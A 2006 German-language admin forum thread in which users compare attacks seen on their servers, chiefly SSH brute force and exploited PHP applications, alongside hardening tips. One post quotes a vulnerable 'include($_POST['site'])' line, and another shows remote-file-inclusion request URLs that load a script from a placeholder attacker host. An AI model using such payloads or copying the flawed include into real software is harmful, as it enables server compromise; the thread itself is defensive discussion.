Serverhack-Statistik - Der wahrscheinlichste Angriff

Rund um die Sicherheit des Systems und die Applikationen
tomotom
Posts: 330
Joined: 2006-09-22 13:37

Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by tomotom » 2006-11-02 10:10

Da ja in diesem Forum einige Personen Erfahrungen in der Serveradministration haben wird es sicher auch Erfahrungen über:

warscheinlichste Angriffe
häufigsten Anfriffe
Vorspiel eines Angriffs (Das Sammeln von Infos des Hackers) Angriffsversuche
Ausmaß bzw. Schäden des Angriffes
Angriffsgeschichten


geben. Es währe ja ganz interessant sich darüber, was am wahrscheinlichsten bzw. häufigsten geschieht, ein Bild zu machen.

Welche Dienste sind am häufigsten angegriffen worden?
Welche Angriffe waren bei welcher Konstellation erfolgreich?


Weiterhin wäre es interessant zu erfahren wie weit das chrooten von Diensten wie Webserver, DNS, MTA etc. in Angriffssituationen geholfen hat. Userdaten sollten ja z.B. bei einem erfolgreichen Apacheangriff geschützt sein wenn der Apache im rootjail läuft.

Sollten erfolgreiche Angriffe z.B. durch fehlerhafte php-scripte erfolgt sein wäre interessant, verfolgen zu können, was der Angreifer getan hat bzw. versucht hat.

Waren die Ziele der Angriffs bewusst ausgesucht oder wurde der Server nur zufällig ausgewählt weil vom Angreifer der Weg des geringsten Widerstandes gewählt wurde?
Was waren vermutlich die Intentionen des Angreifers?

duergner
Posts: 923
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by duergner » 2006-11-02 12:30

Nur mal ganz allgeimein gesprochen ... die am haeufigsten auftretenden Sachen sind meiner Meinung nach fehlerhafte PHP/Perl Skripte mittels welche eine Remote Shell geladen wird. Und danach kommt es halt drauf an wie up2date das System ist, sprich ob es local-root Exploits gibt. Sollte kein local-root Exploit machbar sein kommen dann oft IRC Bouncer drauf, es wird Spam verschickt oder die Kiste wird fuer DDoS oder zum Hacken anderer Server verwendet.

lord_pinhead
Posts: 774
Joined: 2004-04-26 15:57

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by lord_pinhead » 2006-11-02 13:34

Um sowas in Statistiken zu packen, wäre es vielleicht ratsam ein IDS System zu installieren und aus den Logs dann sein Antwort ableiten. Aber ich stimme duergner auch zu, massenhaft Scriptkiddies versuchen über den Apachen ins System zu kommen, andere Software wird immer sicherer (abgesehen vom Linuxkernel) und die nachlässigkeit der PHP und Perl Programmierer ist viel einfacher auszunutzen. Sobald man allerdings einen Samba Server im Netz stehen hat, richten sich alle Kinderaugen darauf, und es werden die Windows Exploits oder Bruteforce Tools ausgepackt, jedenfalls war das meine Erfahrung mit einem Spaßserver (ein lob an die Xen Programmierer :) ).

User avatar
Joe User
Project Manager
Project Manager
Posts: 11139
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by Joe User » 2006-11-02 13:49

Lord_Pinhead wrote:Um sowas in Statistiken zu packen
Lüge -> gemeine Lüge -> Statistik

Glaube keiner Statistik die Du nicht selbst gefälscht hast.

SCNR
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

EdRoxter
Posts: 483
Joined: 2006-01-06 03:23
Location: Neben Bonn

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by EdRoxter » 2006-11-02 13:58

79,41% aller Statistiken sind aus der Luft gegriffen. ;)

tomotom
Posts: 330
Joined: 2006-09-22 13:37

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by tomotom » 2006-11-02 14:12

Joe User wrote:
Lord_Pinhead wrote:Um sowas in Statistiken zu packen
Lüge -> gemeine Lüge -> Statistik
Glaube keiner Statistik die Du nicht selbst gefälscht hast.
SCNR
Nur zur Aufmerksamkeit: Gefragt sind EURE Erfahrugnen und keine Spekulationen. Eine "Statistik" auf die sich hier bezogen werden könnte existiert hier nicht.
EdRoxter wrote:Um sowas in Statistiken zu 79,41% aller Statistiken sind aus der Luft gegriffen.
Der Begriff "Statistik" ist vielleicht falsch gewählt, das er offensichtlich vom Thema ablenkt. Lest doch bitte mal genau, gefragt sind EURE erlebten Angriffszenarien etc.

Es gibt hier KEINE Statistik auf die sich bezogen werden könnte, nur zusammengetragenen Erfahrungen. Diese sind interessant und nicht Eure Meinung über Statistiken :wink:

superdreadnought
Posts: 13
Joined: 2006-11-02 13:56

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by superdreadnought » 2006-11-02 14:12

Joe User wrote:
Lord_Pinhead wrote:Um sowas in Statistiken zu packen
Lüge -> gemeine Lüge -> Statistik

Glaube keiner Statistik die Du nicht selbst gefälscht hast.

SCNR
^^ so isses, aber DoS ist schon am verbreitesten, nachdem der auch ohne sicherheitslücken in proggys geht und eine gute möglichkeit siche ine lücke ins haus zu holen ist die benutzung von open_ssl ...

EdRoxter
Posts: 483
Joined: 2006-01-06 03:23
Location: Neben Bonn

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by EdRoxter » 2006-11-02 14:25

Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)

tomotom
Posts: 330
Joined: 2006-09-22 13:37

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by tomotom » 2006-11-02 14:35

EdRoxter wrote:Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)
Ja ja :) Und wo sind Deine Erfahrungen?

captaincrunch
Userprojekt
Userprojekt
Posts: 7066
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by captaincrunch » 2006-11-02 14:38

Dann wollen wir doch mal:
Welche Dienste sind am häufigsten angegriffen worden?
SSH, aber eher automatisiert durch Bots, etc. Ansonsten halt Webapplikationen.
Welche Angriffe waren bei welcher Konstellation erfolgreich?
Frag mich das in ein paar Wochen noch mal (siehe Blog). ;)
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

superdreadnought
Posts: 13
Joined: 2006-11-02 13:56

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by superdreadnought » 2006-11-02 14:49

CaptainCrunch wrote:Dann wollen wir doch mal:
Welche Dienste sind am häufigsten angegriffen worden?
SSH, aber eher automatisiert durch Bots, etc. Ansonsten halt Webapplikationen.
da hilft am besten public-key authentication. damit rechnet erstens kein scriptkiddie und zweitens kann man den private key nicht einfach so erraten ...

captaincrunch
Userprojekt
Userprojekt
Posts: 7066
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by captaincrunch » 2006-11-02 15:10

Danke für den Tip, nur gibt's bei mir seit Jahren ausschließlich PubKey-Auth. Die Aussage stammt viel eher aus Erfahrungen, die ich mit Hilfe von http://kojoney.sourceforge.net/ sammeln konnte.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

EdRoxter
Posts: 483
Joined: 2006-01-06 03:23
Location: Neben Bonn

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by EdRoxter » 2006-11-02 15:23

tomotom wrote:
EdRoxter wrote:Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)
Ja ja :) Und wo sind Deine Erfahrungen?
Ein paar Versuche, meinen Indianer als Proxy zu nutzen, viel versuchter Spam in einigen Gästebüchern, einmal hat's einer geschafft ein unsauberes Kontaktformular eines Kunden zum Spamversand zu bewegen.. Viele, viele UDP-Portscans, wahrscheinlich nach offenen Rootkits oder so.. Ansonsten bin ich bisher von fieseren Versuchen verschont geblieben.
Ich würde pauschal auch schlechte Webapplikationen als Hauptziel für Angriffe bezeichnen.
Ach ja: Bevor ich n00bhafterweise meinen SSH-Port umgelegt habe (PubKey und permit_root_login sind selbstvertürlich auch drinne), kamen auch vieeeele Versuche, ein Login zu bruteforcen.

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by rootsvr » 2006-11-02 16:45

Lord_Pinhead wrote:Um sowas in Statistiken zu packen, wäre es vielleicht ratsam ein IDS System zu installieren und aus den Logs dann sein Antwort ableiten.
Sowas hatte ich als Thema in meiner Diplomarbeit (seit vier Wochen abgegeben *YES*), im Endeffekt bringt nen IDS da auch nicht viel, es erkennt nur was Du konfigurierst (woher bekommt man die aktuellsten Regeln für neue Exploits?) und dann ist Klioweise False Positives, bei meinen Untersuchungen waren die meisten (ernstgemeinten) Angriffe vom SQL Slammer, aber was sagt mit das für nen Linuxserver? Garnichts!

Um mal was für die Statistik beizutragen:
In einem Kundenscript ein

Code: Select all

include($_POST['site'])
einmal nen vergessenes phpbb

Die sinnlosen ssh-scans führe ich garnicht auf, PublicKey + sichere Passwörter (Murphy sagt: Du mußt nur dringend auf den Server wenn Du deinen Secret Key daheim gelassen hast) haben bisher nichts durchkommenlassen.

EdRoxter
Posts: 483
Joined: 2006-01-06 03:23
Location: Neben Bonn

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by EdRoxter » 2006-11-02 16:46

.. für sowas gibt's USB-Sticks, die man am Schlüsselbund trägt. :D

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by rootsvr » 2006-11-02 17:01

Nachdem meine Freundin meinen immer am Mann getragenen USB Stick schon mal gewaschen hat kann Murphy auch da zuschlagen. Wenn mann sichere Passwörter hat spricht relativ wenig gegen ssh mit Passwort, nen Szenario konstruieren kann man imho immer.
Ich nutze Public Key wo es geht und wo nicht eben Passwort.

EdRoxter
Posts: 483
Joined: 2006-01-06 03:23
Location: Neben Bonn

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by EdRoxter » 2006-11-02 17:02

Meinen habe ich auch schonmal gewaschen. Aufgemacht, gefönt, läuft weiterhin einwandfrei.



...


</OT> :)

lord_pinhead
Posts: 774
Joined: 2004-04-26 15:57

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by lord_pinhead » 2006-11-02 19:02

Soviel zum Thema Datenreinigung :D

@rootsrv
Ist auch wieder wahr das ein IDS nur das protokolliert was ich konfiguriere, aber vieles geht ja sonst schon verloren weil dieser Dienst schon gar nicht am Server läuft. Also weiß ich teilweise nichtmal das es jemand versucht hat. Und wenn ich richtig Paranoid bin, lass ich jeden Shellcode protokollieren und jedes PHP Script das nach gewissen Muster aussieht. Eine solche Maschine eignet sich ja auch nicht als Produktivkiste, oder nur so das ich 100% weiß was darauf läuft und ich alles andere ausschliessen kann.

p.s. Stellst du deine Arbeit auch mal Online zum schmöckern ;)

@Joe
Heißt das nicht Lüge -> Lügen -> Benchmarks ;)

BTT: Also Erfahrungen hab ich bisher nicht mit SSH gemacht, klar, entweder es läuft Portknocker, oder wo ich nicht richtig rankomme im Notfall eben auf einem anderen Port. Also sind 99,9999% Versuche über den Indianer, der Rest verteilt sich auf versuche ein Openrelay zu finden, und ein paar Shellcode Attacken die für Windosen gefährlich wären. Was sonst an Portscans da durchläuft juckt mich nichtmal, wer sich beim Scannen erwischen lässt kann keine bedrohung sein :D

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by Roger Wilco » 2006-11-02 19:12

Lord_Pinhead wrote:@Joe
Heißt das nicht Lüge -> Lügen -> Benchmarks ;)
Hier gilt Benchmark € Statistiken (mit € = istElement).

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by rootsvr » 2006-11-02 23:26

Lord_Pinhead wrote: @rootsrv

p.s. Stellst du deine Arbeit auch mal Online zum schmöckern ;)
Würde ich wenn ich darf, aber der Finanzierer hat was dagegen (Sperrvermerk...)

User avatar
daemotron
Administrator
Administrator
Posts: 2635
Joined: 2004-01-21 17:44

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by daemotron » 2006-11-03 14:35

Das statistische Bild stabilisiert sich langsam 8)
Früher waren es in der Hauptsache Bruteforce gegen SSH, heute hauptsächlich der Versuch, IIS-Exploits bei meinen diversen Webservern (Apache und Lighty) anzuwenden - liebe Bot-Programmierer, schämt Euch :D. Wenn man Spam als Angriff bezeichnen will, hat der natürlich in den letzten Jahren dramatisch zugenommen - die Versuche, meine Mailserver als Relay zu missbrauchen allerdings nicht (konstant ca. 20-50 Versuche pro Tag). Ergo komme ich ganz gut mit den üblichen Absicherungsmaßnahmen über die Runden: SSH nur über public key, bei HTTP Prüfung der Request Header auf Injection-Versuche (URL, POST, GET), MTA als closed relay - Ehrensache. Nur bei den Maildiensten bin ich ständig am nachrüsten - irgendwie fällt den Spammern immer was neues ein, und bei den Massen, die heute aussortiert werden müssen, frisst mir reine Textmustererkennung zu viele Ressourcen...

franki
Posts: 60
Joined: 2005-05-31 16:23
Location: Dresden

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by franki » 2006-11-06 14:58

Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. Mit den selbst geschriebenen Skripten gab es nie Probleme. Dieses Jahr haben wir eine Menge Lehrgeld zahlen müssen. Einmal war es Mambo/Joomla (siehe http://www.linuxserverforum.de/vb/showthread.php?t=1579) und einmal Horde3. Mittlerweile ist überall die Shorewall-Firewall und mod_security installiert.

Gruß von Franki.

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by rootsvr » 2006-11-06 15:18

franki wrote:Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. Mit den selbst geschriebenen Skripten gab es nie Probleme.
Neue Exploits werden häufig von bots ausgeführt und die gehen halt auf verbreitete Standardsoftware. Es gab aber auch Bots, die Systematisch alle Parameter einer php Webseite versucht haben mittels Remote file inclusion zu hacken, sah dann so aus:
meineSite.de/index.php?site=http://bösesseite.de/a.php&session=00122388

meineSite.de/index.php?site=menu&session=http://bösesseite.de/a.php
...
per Hand hackt heute niemand mehr (oder es fällt kaum jemandem auf *g*)

tomotom
Posts: 330
Joined: 2006-09-22 13:37

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by tomotom » 2006-11-07 13:07

franki wrote:Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. ...Einmal war es Mambo/Joomla ... und einmal Horde3...
Mir ist nicht klar wie z.B. PHP-Software welche standardmäßig durch einen Login "geschützt" ist für Agriffe ausgenutzt werden kann.

Waren oder sind es fehlerhafte Login Seiten (z.B. bei Horde3)oder vielleicht die eingeloggten User selbst welche die Angriffen durchführen?

Wenn, wie bei phpmyadmin üblich, der Zugang über htacces erfolgt kann den da ein Angriff auf die scripte von phpmyadmin erfolgen. Ich gehe davon aus, dass bei durch htacces geschützten Seiten ein Angriff so gut wie ausgeschlossen ist.

aubergine
Posts: 471
Joined: 2005-09-10 17:52
Location: Frankfurt am Main

Re: Serverhack-Statistik - Der wahrscheinlichste Angriff

Post by aubergine » 2006-11-07 13:27

Reele Erfahrungen sind gefragt, hm das find ich gut. Da mach ich mal mit 8)

=> PHP-Software

Bisher:

A bit of time ago...
Ein User aus Dänemark hat sich durch einen VHCS2 Bug (%20%20%20...)
einen weiteren Admin User angelegt.

Folgen:

Deface der Page. Durch Vorsorge mit mod_security und openbasedir etc. konnte schlimmeres verhindert werden. Er wollte eine PHP Shell draufladen.

Konsequenzen:
VHCS2 vom Netz genommen bis der Bugfix kam (glaube das war grade mal ein Tag, von daher ist die Software recht gut gewartet)